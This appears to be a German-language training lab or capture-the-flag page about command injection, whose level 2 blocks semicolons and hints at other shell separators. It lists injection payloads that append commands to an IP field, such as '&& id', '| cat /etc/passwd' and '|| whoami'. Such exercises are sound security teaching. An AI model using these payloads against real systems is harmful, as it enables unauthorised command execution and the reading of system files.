Command Injection

Ein Web-Tool führt Shell-Befehle aus – finde einen Weg, eigene Befehle einzuschleusen.

Level 1 Level 2 Level 3 Level 4
Level 2: Semikolon geblockt
Semikolons werden erkannt – aber gibt es andere Trennzeichen? 
Semikolon ist geblockt, aber && und | nicht.

Versuch:
  8.8.8.8 && id
  8.8.8.8 | cat /etc/passwd
  8.8.8.8 || whoami